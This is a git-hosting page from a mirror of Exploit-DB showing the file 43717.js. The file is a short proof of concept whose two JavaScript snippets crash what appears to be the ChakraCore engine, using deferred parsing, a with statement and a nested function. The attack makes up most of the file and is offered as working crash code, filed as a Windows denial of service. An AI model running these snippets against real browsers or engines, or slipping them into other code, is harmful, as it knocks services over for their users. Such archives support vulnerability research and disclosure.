bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/43717.js
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
476 B
JavaScript
Raw Blame History

/*
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to issue 1310 .
PoC:
*/
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());` + '\n'.repeat(0x1000));
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());
Reference in a new issue View git blame Copy permalink